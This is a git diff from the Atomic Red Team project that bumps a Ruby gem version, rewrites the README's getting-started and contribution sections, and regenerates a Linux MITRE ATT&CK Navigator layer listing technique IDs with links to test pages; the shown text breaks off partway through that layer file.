diff --git a/Gemfile.lock b/Gemfile.lock
index 68078e7a..d1f9a35d 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -12,7 +12,7 @@ GEM
minitest (~> 5.1)
tzinfo (~> 1.1)
zeitwerk (~> 2.2, >= 2.2.2)
- addressable (2.7.0)
+ addressable (2.8.0)
public_suffix (>= 2.0.2, < 5.0)
coffee-script (2.4.1)
coffee-script-source
diff --git a/README.md b/README.md
index 0a0bc26d..507cc52d 100644
--- a/README.md
+++ b/README.md
@@ -1,59 +1,39 @@
# Atomic Red Team
+
[](https://circleci.com/gh/redcanaryco/atomic-red-team)
-Atomic Red Team allows every security team to test their controls by executing simple
-"atomic tests" that exercise the same techniques used by adversaries (all mapped to
-[Mitre's ATT&CK](https://attack.mitre.org)).
+Atomic Red Team is library of tests mapped to the
+[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
+Atomic Red Team to quickly, portably, and reproducibly test their environments.
-## Philosophy
+## Get started
-Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
-focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks.
+You can execute atomic tests directly from the command line, no installation
+required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
+page of our wiki.
-Three key beliefs made up the Atomic Red Team charter:
-- **Teams need to be able to test everything from specific technical controls to outcomes.**
- Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
- what our controls and program can detect, and what it cannot. We don’t have to detect every adversary, but we
- do believe in knowing our blind spots.
+For a more robust testing experience, consider using an execution framework like
+[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
-- **We should be able to run a test in less than five minutes.**
- Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
- We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
- run in a few minutes.
+## Learn more
- The best test is the one you actually run.
+The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
-- **We need to keep learning how adversaries are operating.**
- Most security teams don’t have the benefit of seeing a wide variety of adversary types and techniques crossing
- their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
- which makes the community working together essential to making us all better.
+For information about the philosophy and development of Atomic Red Team, visit
+our website at .
-See: https://atomicredteam.io
+## Contribute to Atomic Red Team
-## Having trouble?
+Atomic Red Team is open source and community developed. If you're interested in
+becoming a contributor, check out these resources:
-Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) ([Request Invite](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link))
-
-## Getting Started
-
-* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team)
-* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/wiki/Executing-Atomic-Tests#execute-an-atomic-test-with-an-execution-framework)
-* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
- - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv))
- - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv))
- - Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv))
-* Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json))
-* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications
-* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
- * Need a Slack invitation? Submit an invite request via this [Google Form](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link)
-
-## Code of Conduct
-
-In order to have a more open and welcoming community, Atomic Red Team adheres to a
-[code of conduct](CODE_OF_CONDUCT.md).
-
-## License
-
-See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
+- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
+ with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
+ before you join.
+- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
+- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+ for more information about contributing directly to this repository.
+- Check the [license](LICENSE.txt) for information regarding the distribution
+ and modification of Atomic Red Team.
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index 509eba67..ec2db3f7 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob